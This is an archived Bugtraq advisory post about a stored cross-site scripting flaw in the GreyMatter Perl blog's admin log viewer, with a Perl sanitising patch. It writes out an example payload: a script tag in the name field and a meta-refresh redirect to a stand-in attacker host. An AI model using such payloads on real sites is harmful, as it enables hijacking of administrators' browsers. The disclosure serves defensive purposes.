Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

XSS in GreyMatter blog

from [poizon] Network Security [Permanent Link]
Subject: XSS in GreyMatter blog
Date: Wed, 31 Aug 2005 12:58:35 +0400 (MSD) 
Graymatter - perl based web blog.
offsite: http://www.greymatterforums.com/
GM analyze posting comments and if post contain some dangerous code (like
<script></script>), administrator get message about it   in log files. Log
files contain  not only message, but dangerous code.
When admin try to look log files (Admin panel Options: "View Control Panel
Log"), code execute in admin's browser.
Example attack:
Add comments:
Name: <script>alert('XSS')</script>
Comment:
<meta http-equiv="refresh" content="0;
url=http://site_with_danger_content.evil"/>

And admin can't enter in "View Control Panel Log" menu, because this page 
is redirecting on attacker site.
Solution:
Edit gm-library.cgi. Like that:
-----------------------------------------------------------
open (FUNNYFEET, "gm-cplog.cgi");
@gmlogfile = <FUNNYFEET>;
close (FUNNYFEET);

foreach $gmlogfileline (@gmlogfile) {
        chomp ($gmlogfileline);
        $gmlogfileline=~s/<b>/#BOLD_OPEN#/ig;
        $gmlogfileline=~s/<\/b>/#BOLD_CLOSED#/ig;
        $gmlogfileline=~s/<font size="1">/#FONT_OPEN#/ig;
        $gmlogfileline=~s/<\/font>/#FONT_CLOSED#/ig;
        $gmlogfileline=~s/<|>|&lt;|&gt;/#/ig;
        $gmlogfileline=~s/#BOLD_OPEN#/<b>/ig;
        $gmlogfileline=~s/#BOLD_CLOSED#/<\/b>/iig;
        $gmlogfileline=~s/#FONT_OPEN#/<font size="1">/g;
        $gmlogfileline=~s/#FONT_CLOSED#/<\/font>/ig;
        print "$gmlogfileline<BR>";
}
print qq(<font size="1">All danger tags replace with # symbol</font><BR>);
-------------------------------------------------------
Sory for my english, it's not my primary language.
---------------------------------------------------------
http://www.securityinfo.ru
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • XSS in GreyMatter blog, poizon <=
Previous by Date:  [security bulletin] SSRT051003 rev.0 - HP-UX Java Web Start remote unauthorized privileged access, security-alert
Next by Date:  Obsidis #1 Call for Papers, angelo
Previous by Thread:  [security bulletin] SSRT051003 rev.0 - HP-UX Java Web Start remote unauthorized privileged access, security-alert
Next by Thread:  Obsidis #1 Call for Papers, angelo
Indexes:  [Date] [Thread] [Top] [All Lists]